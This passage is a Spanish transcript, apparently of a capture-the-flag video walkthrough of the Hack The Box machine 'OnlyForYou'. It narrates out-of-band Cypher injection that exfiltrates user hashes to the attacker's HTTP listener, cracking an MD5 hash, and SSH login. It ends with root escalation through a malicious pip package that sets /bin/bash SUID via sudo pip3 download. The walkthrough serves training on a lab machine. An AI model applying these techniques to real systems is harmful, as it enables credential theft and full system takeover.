en verdad esto es vulnerable a inyección Cypher. Entonces vamos a Hacktricks y vamos a ver este payload que sirve según para poder obtener la versión de Neo4j que se está utilizando en el servidor. Vamos a pegar todo este payload por aquí. Todo esta es la query en lenguaje Cypher. Y parece ser que aquí debemos ponerle una dirección IP de una máquina. Vamos a ponerle la nuestra para que los resultados no llegue a nuestra máquina. Nosotros aquí nos debemos montar un servidor HTTP simple. Vamos a hacer sudo python 3 HTTP en el puerto 80. Y ok, aquí ya estamos en escucha para cualquier comunicación que se haga en el puerto 80. Vamos a ponernos aquí nuestra dirección IP 10.10.14.671. Y ok, vamos a decirle a esta query que los resultados nos lo cargue en esta dirección IP para ver si es que la recibimos por acá. Entonces aquí todo esto no va a pasar nada porque no está URL encodeado. Nosotros lo debemos URL encodear. Podemos utilizar Bursuit mismo, seleccionamos todo, ponemos aquí Convert Selection, URL, y es importante en la Cypher Injection que solamente encodeen los caracteres clave. No deben URL encodear todo. Aquí los caracteres clave. Le damos en Send para ver qué es lo que sucede. Y si nos vamos por aquí, a donde nosotros estábamos en escucha en el puerto 80, vemos que efectivamente recibimos una petición GET y parece que nos está mostrando lo que es la versión del Cypher, del Neo4j que está corriendo en el servidor. Vemos que es un Neo4j 5.6.0. Entonces con esto ya nosotros podemos confirmar que ese campo search, este campo de aquí, el campo search es vulnerable a inyección Cypher. Entonces vamos a probar otros payloads para poder obtener información mucho más clara y que nos pueda servir de algo. Como nosotros vimos, aquí nosotros nos habíamos logueado como admin. Entonces podríamos nosotros pensar que hay más usuarios y esos usuarios pueden tener una contraseña. Entonces vamos a buscar tablas que aquí en lenguaje de Neo4j son labels. Las tablas son labels. Vamos a buscar los labels para ver qué tiene. Deberían haber, por ejemplo, labels de usuarios, de contraseñas y cosas así. Vamos a utilizar este payload de aquí. Sin embargo, vamos a copiarlo solamente desde aquí, caldb, porque nosotros ya vimos que esto sí no funciona. Aquí vamos a URL decodearlo para poder poner el otro payload. Y aquí esto nos había funcionado. Entonces vamos a ponerle esto aquí, as l return 0. Vamos a borrar todo esto y vamos a copiar desde aquí.
hasta aquí, ASL, que es, todo esto ya nos había funcionado. Entonces aquí lo vamos a pegar y con esto le estamos diciendo en el lenguaje Cypher que nos muestre los labels o las tablas, entre comillas, que hay en esa base de datos orientada a grafos. Vamos a poner aquí otra vez nuestra dirección IP para que nos mande esa respuesta a nuestro servidor Python que nosotros tenemos montado, 171. Listo, entonces esto ahora lo URL encodeamos de nuevo con selection, solamente los caracteres clave, le damos en send y vemos que demora un poco. Vamos a ver por aquí y vemos que nos muestra información. Vemos que existe un label user y existe un label employee. Esto ya nos está mostrando información de lo que parece ser es la base de datos Neo4j. Entonces nosotros nos interesa ver qué información hay en este label user. ¿Cómo podemos hacer eso? Aquí en Hacktricks mismo nos dice cómo podemos obtener las propiedades de una key. En este caso la key es esto, user o employee. Entonces, ¿cómo nosotros podemos obtener información de esas keys, de esas tablas o de esos labels? Utilizando este payload de aquí. Si nosotros copiamos todo este payload, lo pegamos por aquí, así mismo, hacemos la query. Aquí le estamos diciendo que queremos ver las propiedades que hay en user, no en flag, en user. Aquí en Hacktricks les pone como ejemplo flag, pero aquí nosotros debemos reemplazar con lo que nosotros habíamos encontrado. Vemos que aquí hay el label user y el label employee. Entonces vamos a ver qué información hay en user. Y aquí de nuevo nos ponemos nuestra dirección donde nosotros tenemos montado nuestro servidor Python para que nos mande toda esa información a nuestro servidor. URL encodeamos de nuevo esto, le damos en send y vemos que demora un poco. Si nosotros nos vamos por aquí, vemos que ya nos bota información. Vemos que nos bota información de username, admin y password. Vemos que un hash, nos parece ser que esto es un hash. Al parecer este es el hash que corresponde a admin y vemos otro usuario aparte de admin, vemos el usuario John y vemos que tiene como password este hash. Vamos a intentar craquear este hash para no estar utilizando John, vamos a utilizar lo que se denomina la utilización de Rainbow Tables, de tablas arcoíris. Esto porque esto parece ser un hash MD5. Y para craquear un hash MD5 fácilmente se puede utilizar la técnica de Rainbow Tables y esto lo hace esta página hashes.com. Aquí debemos desactivar el burst sweep, debemos recargar. Aquí debemos pegar el hash, le damos en show algorithm nbkt6j, le damos en search. Ok, me equivoqué, YZQ4CY, le damos en search y vemos que nos muestra el hash ya decodeado. Aquí nos dice, this is for you. Parece ser que esta es la contraseña del usuario John. Entonces ya encontramos información clave. Vamos a parar este servidor HTTP y nos vamos a donde teníamos HTTP, only for you, contenido. Vamos a crearnos un archivo que se llama creds John y este es la credencial de John. Nosotros al principio habíamos visto que la máquina tiene el puerto 22 abierto. Entonces nosotros podríamos pensar en entrar por el puerto SSH. Ya tenemos nosotros un usuario y una contraseña. Vamos a utilizarlo. Vamos a por aquí, SSH, le decimos John, que era el nombre de usuario. Le decimos la dirección de la máquina víctima, 210. Le damos en Enter, le damos en Yes y pegamos la contraseña que nosotros habíamos encontrado para John y vemos que efectivamente nos deja entrar. Es decir, ya podemos acceder a la máquina víctima utilizando esta contraseña como usuario John. Aquí nosotros damos un export term y jugar al xterm para poder hacer un control L y podremos ver la primera flag, que es la flag de usuario. Aquí cat user txt y esta es la primera flag que ustedes deben poner para validar en Hackdebox que ya cumplieron con la parte de intrusión de la máquina. Aquí ya nosotros terminamos la primera parte, la parte de intrusión. Ya accedimos como un usuario legítimo del sistema víctima. Y bueno, hasta aquí la parte de intrusión. Espero se haya entendido. Esta parte del Cypher Injection es un poco confuso para los que nunca han topado esto de las bases de datos en Neo4j y el lenguaje Cypher. Pero bueno, con práctica y simplemente haciendo uso de estas herramientas como Hacktricks podemos ver que podemos utilizarlos para nuestra conveniencia.
Y bueno, ya como usuario yo, nosotros vamos a intentar escalar privilegios para hacer root. Nosotros queremos meternos a este directorio root, al cual no nos deja meter ahora porque no tenemos privilegios. ¿Y cómo hacemos esto? Lo de siempre, vamos a hacer un sudo -l para ver si tenemos permisos de sudoer. Y vemos que como usuario yo sí que tenemos un permiso para abrir como root sin necesidad de pasar contraseña. Todo esto de aquí. Aquí está utilizando pip3, que es un gestor de paquetes de librerías de Python para poder instalar o descargar paquetes de Python, módulos de Python. Vemos que podemos hacer todo esto como root. Aquí está utilizando la función de download para descargar al parecer un paquete de Python en esta dirección IP, utilizando esta dirección. Vemos que está apuntando a la dirección de la máquina de localhost, apuntando al puerto 3000. Nosotros habíamos utilizado el puerto 8000, en donde nosotros habíamos encontrado el Cypher Injection. Sin embargo, habíamos encontrado esto en el puerto 3000. Todavía no sabemos qué es esto. Nosotros podríamos investigar qué es GeoGS. Entonces por aquí nos dice GeoGS es un clon de la conocida plataforma GitHub, pero de software libre, publicado bajo licencia MIT, bla, bla, bla. Entonces esto es como un GitHub, pero barato. Entonces vamos a intentar loguearnos utilizando las credenciales que nosotros ya habíamos encontrado, que es esta de aquí, This is for you. Vamos a intentar entrar como el usuario John para ver si es que hace reutilización de contraseña y vemos que sí nos deja entrar. Entonces, ¿nosotros qué podríamos pensar por aquí? Vemos que utiliza pip y podemos hacer todo esto como root. Eso es importante. Tengan en cuenta que todo esto podemos hacer como root. Podemos instalar paquetes. Aquí con el wildcard asterisco estamos diciéndole, o bueno, está diciéndole aquí este comando, que podemos escribir cualquier cosa aquí siempre y cuando termine en .tar.gz. Entonces aquí podríamos poner una dirección, cualquier dirección. Como sabemos que es el puerto 3000 y el puerto 3000 está este GitHub pobre, podemos por aquí hacer algo. ¿Pero qué cosa? Podríamos buscar en internet vulnerabilidades que podamos hacer con pip3 download. Nosotros vamos a hacer esta pequeña búsqueda, pip3 download exploit, y vamos a ver qué encontramos. Vemos por aquí cositas, vemos malicious Python package en code execution, vemos un code execution y eso es sumamente importante. ¿Por qué? Porque todo esto nosotros lo vamos a hacer como root. Si nosotros llegásemos a ejecutar comandos utilizando este download, los comandos se van a ejecutar como root. Entonces ya eso es algo grave, porque nosotros podríamos ejecutar el comando para darle permisos SUID a la bash. Si nosotros hacemos un bin bash, vemos que la bash no tiene permisos SUID. Entonces, como root, nosotros sí que podríamos darle permisos SUID y vamos a intentarlo utilizando este exploit que nos dice por aquí. Entonces, nos dice que nos debemos clonar este repositorio de aquí. Al parecer por aquí nos dice, vamos a ver primero qué hay por aquí. Vamos a copiar. Bueno, aquí vamos a esta dirección. Open. Vamos a ver qué hay por aquí. Welcome to this is fine. You see basic pip package that runs and command upon pip download o pip install. Explicación. Sector.py contiene la información para ejecutar un comando personalizado que será triggered upon cuando se ejecute pip download. Y nosotros aquí podemos ejecutar pip download. Así que esto nos sirve. Vamos a clonarnos este repositorio en nuestra máquina atacante para ver qué podemos hacer. Vamos por aquí al directorio htb only for you a exploits y aquí vamos a clonarnos este repo. Ok, sudo su con la contraseña, que parrot git clone, copiamos esto, nos clonamos, entramos y vemos que por aquí ls-la esto es lo que se denomina el exploit para explotar esta vaina del download. Vemos por aquí, el z.py contiene el comando que se va a ejecutar. Entonces por aquí sí vemos un z.py. Vamos a manipularlo un poco. Aquí nos dice run command. Parece ser que aquí simplemente está ejecutando el comando print hello pound. Nosotros no queremos ejecutar ese comando. Nosotros queremos ejecutar, como les había dicho, un comando que permita darle permisos SUID a la bash. ¿Cómo lo hacemos eso? Aquí vamos a importarnos la librería de OS para poder ejecutar comandos del sistema. Utilizamos la función system y aquí vamos a decirle que ejecute el comando chmod u más s bin bash. Con esto le estamos diciendo que
le dé permisos SUID a la bash. Entonces, si se ejecuta esto, lo hará como root y se va a hacer entonces efectivamente y podríamos ejecutar la bash con privilegios y ya seríamos root. Entonces, si es que esto funciona, ya estaríamos hechos, ya la máquina estaría terminada. Entonces, sigamos leyendo las instrucciones de esto. Aquí nos dice que el ejemplo básico es simplemente ejecutar un hello pound. Ya nosotros ya vimos eso, ya nosotros pusimos el comando que queremos ejecutar. Nos dice que hagamos un build al package. Le decimos python-m build. Vamos a ver. Para hacer esto, primero ustedes deben instalarse el pip3 install y deben instalarse esta librería de build. Si no, no les va a correr. Aquí mismo en la página les dice que se instalen estas dependencias. Yo ya la tengo instalado, así que simplemente hago un python 3 -m build y con esto ya se va a crear, al parecer, por aquí nos dice, se va a crear un archivo .tar.gz, ¿dónde está? And finally, set to, aquí dice, esto va a crear en este directorio dist un archivo .tar.gz, que ese al parecer es el que nosotros tendríamos que ejecutar en esta máquina, porque aquí vemos que podemos instalar, bueno, descargar una librería de Python en formato tar.gz. Entonces por aquí vemos que ya terminó todo eso, vemos que sí se creó la carpeta dist, nos metemos a esa carpeta, hacemos ls-da y vemos que ahí está el archivo .tar.gz. Vamos a renombrarlo porque ese nombre está muy largo. Vamos a decirle dis.tar.gz, vamos a que se llame pownet.tar.gz. Ya está, aquí tenemos nuestra exploit pownet.tar.gz. Este archivo nosotros vamos a subirlo porque por aquí vemos que descarga la librería desde el puerto 3000. En el puerto 3000 vimos que se está ejecutando este GitHub pobre. Entonces vamos a subirlo por aquí. Como nosotros pudimos loguearnos como John, vamos a subir ese archivo .tar.gz en cualquier repositorio que tenga esta persona John. Ok, aquí nos botó de la sesión de este GitHub pobre. Vamos a hacerle John. Vamos a de nuevo loguearnos. Damos un enter. Y por ejemplo, en este repositorio test que ya está creado, vamos a subir ese archivo, upload file. Vamos a subir el archivo aquí donde estaba en HTTP, only for you, exploits, this is fine, this, aquí está, pownet.tar.gz. Lo subimos, le damos en commit changes y ya estaría subido esto aquí, el pownet.tar.gz. Entonces, ahora, ¿qué restaría por hacer? Vamos a ejecutar esto que podemos ejecutar con sudo. Le decimos sudo sin contraseña y vamos a decirle que nos instale eso que nosotros acabamos de subir en el puerto 3000. ¿Cómo podemos hacer eso? Nosotros aquí entramos al archivo y vamos a copiarnos el link de RAW. Aquí en RAW nosotros le damos en copiar link y por aquí pegamos el link por completo. Bueno, aquí sería solamente de pegarle esto, el directorio, porque ya el puerto 3000 ya está llamándose. Entonces, este es el directorio donde está el .tar.gz. Si nosotros le damos enter, vemos que nos da un error. Nos dice 404 que no encuentra ese archivo. ¿Pero por qué? Si nosotros ya lo habíamos subido. Está por aquí, nosotros podemos verlo. Test, y vemos que sí está. Esto suele suceder porque en GitHub, y bueno, en este caso este GitHub pobre, hay una opción para poder los repositorios en privado. Si los repositorios están en privado, nadie más va a poder acceder a ese repositorio, solamente el dueño. Entonces, vamos a ver si es que este es el caso. Vamos a ver las configuraciones del repositorio y aquí en visibilidad vemos que efectivamente el repositorio está configurado como privado. Es por eso que nadie más, y es por eso que acá no encontró ese archivo y nos daba un 404. Entonces vamos a nosotros desactivar esto para hacerlo público y que cualquiera pueda acceder. Entonces vamos a de nuevo ejecutar el mismo comando y vemos que ahora sí que se nos descargó. Aquí dice successfully downloaded, this is fine, Uzi, bla, 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 bla. Ok, y bueno, ¿ahora qué? Ya se ejecutó, se descargó esa librería. Pero si nosotros vemos la bash, bin bash, vemos que ya tiene permisos SUID. Entonces, ¿qué pasó aquí? Lo que pasó es que se ejecutó el comando que nosotros habíamos puesto aquí, cat z.py. Le dijimos que ejecute este comando, chmod u más s bin bash. Y entonces, utilizando ese exploit, ese archivito tar.gz malicioso,
al ejecutar ese comando para descargar, y como nosotros podíamos ejecutarlo como sudo, siendo root sin contraseña, ese comando se ejecutó como root y la bash ahora ya tiene permisos SUID. Ya simplemente debemos hacer un bash -p para poder ser root. Juega root y ya pueden ir a la carpeta de root y leer la flag. Hasta la flag para que puedan validar que ustedes ya paunearon toda la máquina en Hackthebox. Y bueno, hasta aquí llegó la máquina. Como vieron, toca temas muy interesantes como lo es el Cipher Injection, lo que es raro de ver, eso sí, es raro. Pero bueno, hay ciertas empresas que sí utilizan estas bases de datos basadas en grafos. Y bueno, espero que hayan aprendido bastante y se pongan a practicar haciendo esta máquina. Vamos a hacerlo de siempre, una pequeña recapitulación de lo que se hizo en esta máquina. En primer lugar, que se hizo un análisis de página web y utilizamos mucho Burswip en esta máquina. Nosotros primero utilizamos un LFI para poder encontrar información, leer archivos que nos permitan saber la dirección o ubicación de los recursos de la página principal, porque al principio nosotros encontramos solo un subdominio y ahí encontramos el LFI. Con esto nosotros enumeramos los recursos de la página principal haciendo un fuzzing de archivos .py porque vimos que la página ejecutaba archivos Python. Entonces encontramos este archivo que se llama form.py y el cual se trataba de ese formulario que nos permitía meter nombre, email, subject, message, y eso lo utilizamos ¿para qué? Para hacer un command injection. Aquí mismo utilizando Burswip, nosotros nos dimos cuenta que en ese form.py existía una vulnerabilidad que ejecutaba la función RAM de la librería subprocess, lo cual ejecuta comandos del sistema. Nosotros aquí intentamos una inyección de comandos y efectivamente se la realizó. Y entramos a la máquina como el usuario www.data. Dentro de la máquina nosotros nos dimos cuenta que el puerto 7474 estaba abierto, por lo que dedujimos que una base de datos Neo4j estaba por detrás, una base de datos basada en grafos. Y también vimos que el puerto 3000 y el puerto 8001 estaba abierto. Esos puertos nos los trajimos a la máquina y en el puerto 8001 encontramos una inyección Cypher en el parámetro search. Asimismo, con Burswip utilizamos esto, utilizando payloads para Cypher Injection, logramos sacar información como hashes y usuarios del sistema y encontramos la contraseña del usuario John. Entramos por SSH como John y ahí simplemente vimos que podíamos ejecutar este comando exit sudo -l, podíamos ejecutar este comando como root sin contraseña. Ok, entonces aquí como se estaba utilizando el puerto 3000, vimos que había reutilización de contraseñas en este puerto 3000 y bueno, ya simplemente vimos que existe una vulnerabilidad para el pip3 download. Nosotros así hicimos una búsqueda en internet, simplemente creamos un archivo .tar.gz malicioso, lo subimos a este puerto 3000, apuntamos a ese archivo y ya simplemente se ejecutó el comando malicioso que nosotros inyectamos y pudimos ser root. Y listo, esta sería la máquina de Only4U de la plataforma de Hackthebox, una máquina medium para que se diviertan este fin de semana. Y bueno, ahora que la retiran, que va a estar gratis por 2 semanas más o menos, espero que lo hagan y aprendan mucho, que sigan practicando. Y bueno, voy a seguir trayendo máquinas en estos días. Últimamente no he hecho videos por cuestiones de enfermedad, pero bueno, aquí estamos. Un saludo a todos y bueno,